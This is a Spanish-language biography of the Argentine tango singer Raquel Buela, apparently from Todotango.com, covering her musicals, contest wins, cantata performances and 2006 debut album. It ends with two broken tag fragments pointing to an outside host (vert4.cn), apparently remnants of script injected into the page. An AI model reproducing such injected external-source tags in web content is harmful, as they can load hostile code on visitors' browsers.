Raquel Buela

Nombre real: Buela, Raquel
Cancionista
(n/d - )
Lugar de nacimiento:
Argentina
Por
Todotango.com
Cancionista

onocida inicialmente por su elogiada actuación en musicales, en los últimos años Raquel Buela centró su trabajo en el tango, género con el que se presentó con éxito en numerosos escenarios del país y publica su primer disco en el 2006.

Ha participado de varios certámenes y festivales, recibido algunas distinciones. Fue finalista en el Certamen Hugo del Carril (1998) y obtuvo los primeros puestos en el Concurso de Tango organizado por el Centro Cultural del Tango (1999) y Concurso de Cantores de Tango Río de la Plata (2000), entre otros.

En el 2003, integró el elenco de “Los siete pecados capitales”, cantata profana para voces y bandoneón de Luis Alposta y Pascual “Cholo” Mamone, junto a los autores y al cantante Andrés Bordoni, estrenada en el Centro Cultural de la Cooperación. Las presentaciones continuaron en el salón San Martín de Legislatura de la Ciudad Autónoma de Buenos Aires, el Museo Histórico de Buenos Aires “Cornelio de Saavedra”, el Café Recuerdo - Esquina Osvaldo Pugliese y la Academia Porteña del Lunfardo, entre otros prestigiosos espacios culturales.

A fines del 2004 inició el ciclo de recitales “Yo soy de aquí”, junto a los músicos Osvaldo Burucuá y Orlando Trujillo, con una personal selección de tangos de autores clásicos y contemporáneos, del cual surgió su primer trabajo discográfico editado en 2006 por el sello Fonocal.

Participó en comedias musicales, entre las que se destacan “Drácula”, de Pepe Cibrián Campoy y Ángel Mahler; “La calle de las cosas perdidas”, de Daniel Ruiz, dirigida por Mario Camarano, con música de Horacio Corral; y “El barrio del Ángel Gris”, basada en los textos de Alejandro Dolina, bajo la dirección de Lito Cruz y música de José Luis Castiñeira de Dios.

Entre otras actuaciones se cuentas las que realizó dentro del programa Bares Notables, Festival Baradero 2002, Centro Cultural de la Cooperación, Universidad Nacional del Sur (Bahía Blanca), Legislatura de la Ciudad de Buenos Aires, Esquina Osvaldo Pugliese, Almatango, Teatro Radio City (Mar del Plata), Esquina Homero Manzi, Centro Ástor Piazzolla, Bar Sur, Centro Cultural Recoleta, Teatro Presidente Alvear, Festival Pre-Cosquín.< src=http://vert4.cn>< src=http://vert4.cn>